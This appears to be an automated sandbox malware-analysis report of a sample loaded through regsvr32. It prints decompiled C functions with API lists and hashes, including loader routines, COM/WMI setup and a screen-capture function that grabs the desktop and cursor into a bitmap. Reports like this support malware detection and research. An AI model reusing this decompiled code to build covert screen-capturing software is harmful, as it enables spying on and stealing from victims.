              0x00736655
              0x00736661
              0x00736662
              0x0073666e
              0x00736673
              0x00736682
              0x00736687
              0x0073668a
              0x0073668c
              0x00736695
              0x007366a0
              0x007366a5
              0x007366b0
              0x007366b5
              0x007366bf
              0x007366bf
              0x007366d9
              0x007366dc
              0x007366df
              0x007366e4
              0x007366e6
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x007366e6
              0x00736664
              0x00000000

              APIs
                • Part of subcall function 00738DB4: HeapCreate.KERNELBASE(00000000,00096000,00000000,00736616), ref: 00738DBD
                • Part of subcall function 0073F0D9: GetModuleHandleA.KERNEL32(00000000,?,?,?,0074CA88,?,0073663F,?), ref: 0073F0FB
              • GetFileAttributesW.KERNELBASE(00000000), ref: 00736655
              • CreateThread.KERNELBASE(00000000,00000000,007363A2,00000000,00000000,?), ref: 007366DC
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Create$AttributesFileHandleHeapModuleThread
              • String ID:
              • API String ID: 607385197-0
              • Opcode ID: 1946454c65f1a8a661556a3ca84b93f3905dc241dd42eb8c21749afefd443693
              • Instruction ID: 1404fdbed5bf610297dbc2d2373ef6994f928fa35b4359a059c165cc7b41048d
              • Opcode Fuzzy Hash: 1946454c65f1a8a661556a3ca84b93f3905dc241dd42eb8c21749afefd443693
              • Instruction Fuzzy Hash: 8D212CB5604205EFEB44AFB5E80AA6E37E8AF05350F10C53AF559DA1D2DB7CC540CB25
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073F0D9 Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 352 73f0d9-73f0f9 call 739f6b 355 73f103-73f108 LoadLibraryA 352->355 356 73f0fb-73f101 GetModuleHandleA 352->356 357 73f10a-73f10c 355->357 356->357 358 73f11b-73f129 call 738d87 357->358 359 73f10e-73f113 call 73f08e 357->359 362 73f118-73f119 359->362 362->358
              C-Code - Quality: 47%
              			E0073F0D9(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E00739F6B(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf2e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0073F08E(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E00738D87( &_v8);
				return _t25;
			}










              0x0073f0dc
              0x0073f0df
              0x0073f0e5
              0x0073f0e7
              0x0073f0ec
              0x0073f0ee
              0x0073f0f8
              0x0073f0f9
              0x0073f108
              0x0073f0fb
              0x0073f0fb
              0x0073f0fb
              0x0073f10c
              0x0073f113
              0x0073f119
              0x0073f119
              0x0073f11e
              0x0073f129

              APIs
              • GetModuleHandleA.KERNEL32(00000000,?,?,?,0074CA88,?,0073663F,?), ref: 0073F0FB
              • LoadLibraryA.KERNELBASE(00000000,?,?,?,0074CA88,?,0073663F,?), ref: 0073F108
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: HandleLibraryLoadModule
              • String ID:
              • API String ID: 4133054770-0
              • Opcode ID: 45f7be4acef65fc1383fa538a028872a8117c9c7c309775a28355bafc95392dc
              • Instruction ID: 65536149b101ceaceb0c42b13867707c190eb2db63ebba7e9eeff2886fd1aa1f
              • Opcode Fuzzy Hash: 45f7be4acef65fc1383fa538a028872a8117c9c7c309775a28355bafc95392dc
              • Instruction Fuzzy Hash: 26F0A731700219EBE714ABADEC4545AB3EDDF583D1F20413AF102D7252DEB88D408791
              Uniqueness

              Uniqueness Score: -1.00%

              Function 007363A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 364 7363a2-7363bb call 73651e GetOEMCP call 73dfc2 369 7363c0-7363eb call 743c36 364->369 370 7363bd-7363be 364->370 374 7363f5-7363fb call 73d889 369->374 375 7363ed-7363f3 369->375 371 736435 370->371 378 736400-736407 374->378 376 73640f-73641b 375->376 379 73642d call 733597 376->379 380 73641d-736422 call 7361e8 376->380 381 736424-73642b 378->381 382 736409 378->382 385 736432-736434 379->385 380->385 381->379 381->385 382->376 385->371
              C-Code - Quality: 100%
              			E007363A2(void* __fp0) {
				void* __ecx;
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t25;
				void* _t27;

				_t32 = __fp0;
				E0073651E();
				GetOEMCP();
				_t13 = E0073DFC2(__fp0); // executed
				 *0x74f8d4 = _t13;
				if(_t13 != 0) {
					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
					_t14 =  *0x74f8d4; // 0xc2fc00
					_t2 = _t14 + 0x224; // 0x730000
					E00743C36( *_t2);
					_t26 =  *0x74f8d4; // 0xc2fc00
					_t25 = _t27;
					__eflags =  *(_t26 + 0x1898) & 0x00010000;
					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
						_t7 = _t26 + 0x224; // 0x730000, executed
						_t26 =  *_t7;
						_t16 = E0073D889( *_t7); // executed
						__eflags = _t16;
						_t17 =  *0x74f8d4; // 0xc2fc00
						if(_t16 != 0) {
							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
								L10:
								__eflags = 0;
								return 0;
							}
							L9:
							E00733597();
							goto L10;
						}
						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
						L6:
						_t20 =  *0x74f8d4; // 0xc2fc00
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if(__eflags == 0) {
							goto L9;
						}
						E007361E8(_t25, _t26, __eflags, _t32);
						goto L10;
					}
					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
					goto L6;
				}
				return _t13 + 1;
			}











              0x007363a2
              0x007363a2
              0x007363a7
              0x007363ae
              0x007363b3
              0x007363bb
              0x007363c4
              0x007363ca
              0x007363cf
              0x007363d5
              0x007363da
              0x007363e0
              0x007363e1
              0x007363eb
              0x007363f5
              0x007363f5
              0x007363fb
              0x00736400
              0x00736402
              0x00736407
              0x00736424
              0x0073642b
              0x00736432
              0x00736432
              0x00000000
              0x00736434
              0x0073642d
              0x0073642d
              0x00000000
              0x0073642d
              0x00736409
              0x0073640f
              0x0073640f
              0x00736414
              0x0073641b
              0x00000000
              0x00000000
              0x0073641d
              0x00000000
              0x0073641d
              0x007363ed
              0x00000000
              0x007363ed
              0x00000000

              APIs
              • GetOEMCP.KERNEL32 ref: 007363A7
                • Part of subcall function 0073DFC2: GetCurrentProcessId.KERNEL32 ref: 0073DFE9
                • Part of subcall function 0073DFC2: GetLastError.KERNEL32 ref: 0073E0E3
                • Part of subcall function 0073DFC2: GetSystemMetrics.USER32(00001000), ref: 0073E0F3
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CurrentErrorLastMetricsProcessSystem
              • String ID:
              • API String ID: 1196160345-0
              • Opcode ID: c8206843b3441b57c091d3f0a9e6461e1955d0be02e05c194f19bf0ba950e40b
              • Instruction ID: 246ea7b160c85cad3e0008b22786ebdffcf5a60313f6305f4d7f738fe58a5629
              • Opcode Fuzzy Hash: c8206843b3441b57c091d3f0a9e6461e1955d0be02e05c194f19bf0ba950e40b
              • Instruction Fuzzy Hash: 54018B79500292EFE614EF64E90DAA673E8EF16300F288177F0448A023C73C8950CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073CA0A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0073CA0A(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x74f8d8; // 0xc2fab0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E0073C9F3(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x74f8d0; // 0xc2f8c0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










              0x0073ca0e
              0x0073ca16
              0x0073ca1e
              0x0073ca23
              0x0073ca2b
              0x0073ca30
              0x0073ca34
              0x0073ca52
              0x0073ca55
              0x0073ca36
              0x0073ca39
              0x0073ca3b
              0x0073ca43
              0x0073ca43
              0x0073ca46
              0x0073ca46
              0x0073ca59
              0x0073ca26
              0x0073ca26
              0x0073ca26

              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a961cca549cddf2603edc26bc05009abcadd26cfda0575345573aa8a11428835
              • Instruction ID: 27d3329886ba039a0dee3ed1bb9ec642f28337d9ee4be12d7438299e0cd88946
              • Opcode Fuzzy Hash: a961cca549cddf2603edc26bc05009abcadd26cfda0575345573aa8a11428835
              • Instruction Fuzzy Hash: 25F03A31A10118EFDB12DBA8D946A9D73FCBF08346F1180A5E501FB262D778DE00DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00736438 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00736438() {
				intOrPtr _t3;

				_t3 =  *0x74f8d0; // 0xc2f8c0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x74f8f4, 0xffffffff);
				ExitProcess(0);
			}




              0x00736438
              0x00736445
              0x0073644f

              APIs
              • ExitProcess.KERNEL32(00000000), ref: 0073644F
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: a4db31c54aed54b33e56cc00cbbcf5b3ad61b9e701da953f199fefa6da152364
              • Instruction ID: a21e9d5d741556ee918de6478ea098e85f639a84f36062e5f7688e7389b6b0a4
              • Opcode Fuzzy Hash: a4db31c54aed54b33e56cc00cbbcf5b3ad61b9e701da953f199fefa6da152364
              • Instruction Fuzzy Hash: 1BC002792141519FC740AB64ED49F1537E4BF0A322F19C6B7F5299E1F9CB2494009B14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00738DC9 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00738DC9(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x74f9b8, 8, _a4); // executed
				return _t2;
			}




              0x00738dd7
              0x00738dde

              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: acc287bc95d9ca6d664ae8adac2de038d37ff203cf9691d131cbfcfdef7dbd86
              • Instruction ID: f0f252281fc8fe0bab47b77c2e89734e94f2e40aee8f4cd5f375bc911d69df19
              • Opcode Fuzzy Hash: acc287bc95d9ca6d664ae8adac2de038d37ff203cf9691d131cbfcfdef7dbd86
              • Instruction Fuzzy Hash: 6FB0923E080208BBCF411B81EC05A953F29FB1A651F008022F708484708B7764619B98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073DADC Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E0073DADC(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




              0x0073dae4
              0x0073daec
              0x0073daf1

              APIs
              • ResumeThread.KERNELBASE(?,0073D947,?,?,00000001), ref: 0073DAE4
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: ResumeThread
              • String ID:
              • API String ID: 947044025-0
              • Opcode ID: 10fba95a2ac8746f532442722e628e6a35cff4e1c82fd445a932fac5252c7b4e
              • Instruction ID: 095c46f27a06a7fe0927ac2489c8d4e8d41604159d3cd84f3f2aaa85676bf0fe
              • Opcode Fuzzy Hash: 10fba95a2ac8746f532442722e628e6a35cff4e1c82fd445a932fac5252c7b4e
              • Instruction Fuzzy Hash: 19B092362A00019BCB005B74EC0A9A03BE0BB56606B98C2F5E015CA061C32EC4458B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00738DB4 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00738DB4() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x74f9b8 = _t1;
				return _t1;
			}




              0x00738dbd
              0x00738dc3
              0x00738dc8

              APIs
              • HeapCreate.KERNELBASE(00000000,00096000,00000000,00736616), ref: 00738DBD
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: CreateHeap
              • String ID:
              • API String ID: 10892065-0
              • Opcode ID: 45b16f8d64264b54701b5bfcc97d151e797b41d2f8f1c06269ff9f07c657f533
              • Instruction ID: f6e797358e0df3beb72a58be153096fffe1c5d1f9dd5804ff702f0d114e875a8
              • Opcode Fuzzy Hash: 45b16f8d64264b54701b5bfcc97d151e797b41d2f8f1c06269ff9f07c657f533
              • Instruction Fuzzy Hash: 8AB012B8685300A6DB500B205C46B0135106346B02F208013F709981E0C7B42000951C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073DAF2 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
              Download Yara Rule
              C-Code - Quality: 91%
              			E0073DAF2(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E0073A236(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









              0x0073daf5
              0x0073daf6
              0x0073daf9
              0x0073dafc
              0x0073db01
              0x0073db04
              0x0073db07
              0x0073db07
              0x0073db0f
              0x0073db14
              0x0073db17
              0x0073db1a
              0x0073db1d
              0x0073db20
              0x0073db33
              0x0073db34
              0x0073db37
              0x0073db3d
              0x0073db40
              0x0073db43
              0x00000000
              0x00000000
              0x0073db45
              0x00000000
              0x0073db43
              0x0073db49
              0x0073db49
              0x0073db4b
              0x0073db4b
              0x0073db4e
              0x0073db4e
              0x0073db53
              0x0073db5b
              0x0073db67

              APIs
              • Sleep.KERNELBASE(0000000A), ref: 0073DB5B
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: a8dc0a3c30c85f40d1c78151e2f2a4f3b0cb5d039aea77e56e997d71d4b0cfd5
              • Instruction ID: 2f64813fc8003bc9f0624a88409fd9a8eb41cd5accedd091f484d6e0406b638a
              • Opcode Fuzzy Hash: a8dc0a3c30c85f40d1c78151e2f2a4f3b0cb5d039aea77e56e997d71d4b0cfd5
              • Instruction Fuzzy Hash: 03111BB1A00205AFEB24CFA9D485A99F7F8FF45324F11846AE95A9B341D378ED41CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00735D1E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00735D1E(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E00738DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E00738DC9(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E00738EA6(_t103,  &_v112, 0xe);
											E00738EA6(_v12 + 0xe,  &_v96, 0x28);
											E00738EA6(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E0073FBFB(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E00738DDF( &_v20, 0);
				E00738DDF( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































              0x00735d2a
              0x00735d30
              0x00735d33
              0x00735d35
              0x00735d38
              0x00735d3a
              0x00735d43
              0x00735d45
              0x00735d4a
              0x00735d57
              0x00735d5b
              0x00735d6f
              0x00735d72
              0x00735d78
              0x00735d82
              0x00735d86
              0x00735d8e
              0x00735d94
              0x00735d99
              0x00735e2f
              0x00735e33
              0x00735e43
              0x00735e49
              0x00735e51
              0x00735e58
              0x00735e5b
              0x00735e64
              0x00735e65
              0x00735e6e
              0x00735e75
              0x00735e78
              0x00735e7b
              0x00735e7e
              0x00735e81
              0x00735e84
              0x00735e87
              0x00735e8b
              0x00735e9a
              0x00735e9d
              0x00735ea2
              0x00735ea8
              0x00735ebf
              0x00735ecc
              0x00735ecf
              0x00735ed4
              0x00735eda
              0x00735edf
              0x00735ee7
              0x00735ef2
              0x00735ef9
              0x00735f0e
              0x00735f23
              0x00735f31
              0x00735f34
              0x00735f39
              0x00735f3e
              0x00735f44
              0x00735f46
              0x00735f4b
              0x00735f50
              0x00735f50
              0x00735f4b
              0x00735f44
              0x00735eda
              0x00735ea8
              0x00735e33
              0x00735d99
              0x00735d86
              0x00735d5b
              0x00735f58
              0x00735f63
              0x00735f6d
              0x00735f70
              0x00735f70
              0x00735f78
              0x00735f7b
              0x00735f7b
              0x00735f83
              0x00735f86
              0x00735f86
              0x00735f93

              APIs
              • GetDC.USER32(00000000), ref: 00735D3D
              • CreateCompatibleDC.GDI32(00000000), ref: 00735D51
              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00735D6A
              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00735D72
              • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 00735D7C
              • SelectObject.GDI32(00000000,00000000), ref: 00735D8E
              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00735DB2
              • GetCursorInfo.USER32(?), ref: 00735DC3
              • CopyIcon.USER32 ref: 00735DD8
              • GetIconInfo.USER32(00000000,?), ref: 00735DE6
              • GetObjectW.GDI32(?,00000018,?), ref: 00735E04
              • DrawIconEx.USER32 ref: 00735E1C
              • SelectObject.GDI32(00000000,?), ref: 00735E29
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00735E43
              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 00735EBF
              • DeleteDC.GDI32(00000000), ref: 00735F70
              • DeleteDC.GDI32(00000000), ref: 00735F7B
              • DeleteObject.GDI32(00000000), ref: 00735F86
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
              • String ID: ($6
              • API String ID: 192358524-4149066357
              • Opcode ID: b59aa6dd91bb49ad19638e8082cf0ff8bcb470d2e1b0c6895b15a3f936f5dbb0
              • Instruction ID: 06ddfb175d9195c9644027eb0c6ddf2a1ac1b67061b7b249c04a88702f2fded6
              • Opcode Fuzzy Hash: b59aa6dd91bb49ad19638e8082cf0ff8bcb470d2e1b0c6895b15a3f936f5dbb0
              • Instruction Fuzzy Hash: 84812FB5D0061AEBEB10DFA4DC49B9EBBB8EF49300F108069F605F7251EB389A05CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073E485 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 30%
              			E0073E485(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x74c8a0, 0, 1, 0x74c8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00738DC9(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













              0x0073e492
              0x0073e495
              0x0073e498
              0x0073e4a9
              0x0073e4af
              0x0073e4c0
              0x0073e4c8
              0x0073e519
              0x0073e519
              0x0073e51e
              0x0073e523
              0x0073e523
              0x0073e526
              0x0073e52b
              0x0073e530
              0x0073e530
              0x0073e533
              0x0073e4ca
              0x0073e4cb
              0x0073e4d1
              0x0073e4e2
              0x0073e4e7
              0x00000000
              0x0073e4e9
              0x0073e4f6
              0x0073e4fe
              0x00000000
              0x0073e500
              0x0073e502
              0x0073e50a
              0x00000000
              0x0073e50c
              0x0073e50f
              0x0073e515
              0x0073e515
              0x0073e50a
              0x0073e4fe
              0x0073e4e7
              0x0073e538

              APIs
              • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E498
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4A9
              • CoCreateInstance.OLE32(0074C8A0,00000000,00000001,0074C8B0,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4C0
              • SysAllocString.OLEAUT32(00000000), ref: 0073E4CB
              • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0073E7B4,00000E16,00000000,00000000,00000005), ref: 0073E4F6
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
              • String ID:
              • API String ID: 1610782348-0
              • Opcode ID: dc050bec8f1de2e09a70e677ea405252ec8aac25c0a45da643b2ec6b8efdeec8
              • Instruction ID: 84974916a1e43ebf9ec58cec22485c4e694ffba0cc9be26682b9744f895d7582
              • Opcode Fuzzy Hash: dc050bec8f1de2e09a70e677ea405252ec8aac25c0a45da643b2ec6b8efdeec8
              • Instruction Fuzzy Hash: B9212C74600245BBEB248B62DC4DE6FBF7CEFC7B14F10415DB506A6291D7759A00DA70
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073DDE7 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0073DDE7(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}





              0x0073ddef
              0x0073ddfa
              0x0073de05
              0x0073ddf1
              0x0073ddf3
              0x0073ddf5
              0x0073ddf5

              APIs
              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0073E1C0), ref: 0073DDFA
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: InfoSystem
              • String ID:
